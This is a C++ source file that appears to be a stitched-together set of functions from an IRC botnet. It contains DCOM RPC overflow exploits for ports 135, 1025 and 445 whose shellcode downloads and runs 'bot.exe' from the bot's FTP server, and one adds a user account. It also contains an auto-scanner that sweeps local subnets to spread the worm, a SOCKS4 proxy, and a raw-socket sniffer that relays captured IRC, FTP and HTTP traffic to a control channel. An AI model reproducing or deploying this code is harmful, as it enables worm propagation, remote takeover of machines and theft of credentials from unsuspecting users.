bool CScannerDCOM2::Exploit()
{ char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
char *pTemp;
int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
iLoadSize=iPos; iPos=0;
// Build the request
memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1;
memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1;
memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize;
memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1;
memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1;
iReqSize=iPos; iPos=0;
pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
char szAssocGroup[4];
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
return false;
// Send the bind string
if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
{ m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
{ m_sSocket.Disconnect(); return false; }
// Check for DCE_PKT_BINDACK
if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
// Store the association group for later usage
memcpy(szAssocGroup, szRecvBuf+20, 4);
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize))
{ m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
{ m_sSocket.Disconnect(); return false; }
// Check for DCE_PKT_FAULT
if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return true;
}
void CScannerAuto::Init()
{
#ifndef _DEBUG
if(g_cMainCtrl.m_cBot.scan_auto.bValue)
{ char szLocalIp[32]={0}; char szName[255]={0}; unsigned long lLocalIp;
CMessage mFakeMsg; int i=0; hostent *hEnt;
gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
strcpy(szLocalIp, inet_ntoa(to_in_addr(lLocalIp)));
mFakeMsg.bNotice=false; mFakeMsg.bSilent=true;
mFakeMsg.sChatString.Format(".scan.dcom %s/24 1000000", szLocalIp);
mFakeMsg.sCmd.Assign("scan.dcom");
mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
mFakeMsg.sHost.Assign("AutoScanner.Net");
mFakeMsg.sIdentd.Assign("AutoScanner");
mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
mFakeMsg.sSrc.Assign("AutoScanner");
for(i=0;i<15;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);
mFakeMsg.sChatString.Format(".scan.dcom %s/16 10000000", szLocalIp);
for(i=0;i<25;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); }
#ifdef WIN32
if(g_cMainCtrl.m_cBot.scan_auto_nb.bValue)
{ char szLocalIp[32]={0}; char szName[255]={0}; unsigned long lLocalIp;
CMessage mFakeMsg; int i=0; hostent *hEnt;
gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
strcpy(szLocalIp, inet_ntoa(to_in_addr(lLocalIp)));
mFakeMsg.bNotice=false; mFakeMsg.bSilent=true;
mFakeMsg.sChatString.Format(".scan.netbios %s/24 1000000", szLocalIp);
mFakeMsg.sCmd.Assign("scan.dcom");
mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
mFakeMsg.sHost.Assign("AutoScanner.Net");
mFakeMsg.sIdentd.Assign("AutoScanner");
mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
mFakeMsg.sSrc.Assign("AutoScanner");
for(i=0;i<15;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);
mFakeMsg.sChatString.Format(".scan.netbios %s/16 10000000", szLocalIp);
for(i=0;i<25;i++) g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg); }
#endif // WIN32
#else
//#define SCANTEST
#ifdef SCANTEST
CMessage mFakeMsg;
mFakeMsg.bNotice=false; mFakeMsg.bSilent=true;
mFakeMsg.sChatString.Format(".scan.dcom2 90.0.1.55/32 100");
mFakeMsg.sCmd.Assign("scan.dcom2");
mFakeMsg.sDest.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
mFakeMsg.sHost.Assign("DebugScanner.Net");
mFakeMsg.sIdentd.Assign("DebugScanner");
mFakeMsg.sReplyTo.Assign(g_cMainCtrl.m_cBot.si_mainchan.sValue);
mFakeMsg.sSrc.Assign("DebugScanner");
g_cMainCtrl.m_cScanner.HandleCommand(&mFakeMsg);
#endif // SCANTEST
#endif // _DEBUG
}
void CRedirectSOCKS::StartRedirect()
{ g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "[%s] Starting Socks4 Proxy on port %d.", \
m_sRedirectName.CStr(), m_iLocalPort);
m_sListenSocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(m_sListenSocket==SOCKET_ERROR) return;
sockaddr_in ssin, cssin; memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET; ssin.sin_port=htons(m_iLocalPort);
socklen_t clen=sizeof(cssin);
if(bind(m_sListenSocket, (sockaddr*)&ssin, sizeof(ssin))!=0)
{ xClose(m_sListenSocket); return; }
while(m_pRedirect->m_bRedirecting)
{ if(listen(m_sListenSocket, 10)==SOCKET_ERROR) { Sleep(250); continue; }
int sClientSocket=accept(m_sListenSocket, (sockaddr*)&cssin, &clen);
#ifdef DBGCONSOLE
g_cMainCtrl.m_cConsDbg.Log(1, "CRedirectSOCKS(0x%8.8Xh): Accepted connection from %s...\n", this, inet_ntoa(to_in_addr(cssin.sin_addr.s_addr)));
#endif
if(sClientSocket!=SOCKET_ERROR && sClientSocket!=0)
{ CRedirectSOCKS_Thread *pTemp=new CRedirectSOCKS_Thread;
pTemp->m_pRedirect=m_pRedirect; pTemp->m_pRedirSOCKS=this;
pTemp->m_iLocalPort=m_iLocalPort; pTemp->m_sClientSocket=sClientSocket;
pTemp->m_sReplyTo.Assign(m_sReplyTo); pTemp->m_bSilent=m_bSilent; pTemp->m_bNotice=m_bNotice;
pTemp->Start(); }
else
{ break; } }
if(m_sListenSocket!=INVALID_SOCKET) xClose(m_sListenSocket);
g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "[%s] Unloaded proxy on %d.", \
m_sRedirectName.CStr(), m_iLocalPort); }
bool CScannerDCOM::Exploit()
{
switch(m_sSocket.m_sPort)
{
case 135:
case 1025:
{
char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
if(iHostOS==OS_WINNT) return false;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Prepend NOPs as long as shellcode doesn't fit RPC packet format
while(iSCSize%16!=12)
{ char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0; free(szTemp); }
// Set the return address
if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);
// Build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
iReqSize=iPos;
pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
return false;
// Send the bind string
if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
// Read reply
m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
// Send the evil request
if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
// Read reply
if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return true;
}
break;
case 445:
{
#ifdef _WIN32
NETRESOURCEW nr; bool bRetVal=false;
if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
else
{ int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
char *pTemp;
CString sURL;
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
else
sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Prepend NOPs as long as shellcode doesn't fit RPC packet format
while(iSCSize%16!=12)
{ char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0; free(szTemp); }
// Set the return address
if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);
// Build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
iReqSize=iPos;
pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
// Send the bind string
DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
// Send the evil request
if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
free(szInBuf); }
CloseHandle(hFile);
CloseNullSession(m_sSocket.m_szHost); }
return bRetVal;
#endif // _WIN32
}
break;
default:
return false;
break;
}
return false;
}
DWORD WINAPI SnifferThread(LPVOID param) {
SNIFFER sniff = *((SNIFFER *)param);
SNIFFER *sniffs = (SNIFFER *)param;
sniffs->gotinfo = TRUE;
char sendbuf[IRCLINE];
int sock; sockaddr_in addr_in; hostent *hEnt;
IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket;
char szName[255]={0}; unsigned long lLocalIp;
addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
addr_in.sin_addr.s_addr=lLocalIp;
sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(sock==INVALID_SOCKET) return NULL;
if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
int optval=1; DWORD dwBytesRet;
if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
{
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;
while(1)
{
// Clear the buffer
memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;
// Read the raw packet
iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
// Process if its a TCP/IP packet
if(ipHeader->proto==6)
{ tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
if(iSrcPort !=110 && iSrcPort!=25 &&
iDestPort !=110 && iDestPort!=25)
{
sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
for(int i=0; i<(int)strlen(szPacket); i++) {
if(szPacket[i]=='\r') szPacket[i]='\x20';
if(szPacket[i]=='\n') szPacket[i]='\x20'; }
if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousHTTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousVULN(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
}
}
}
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
return 0;
}
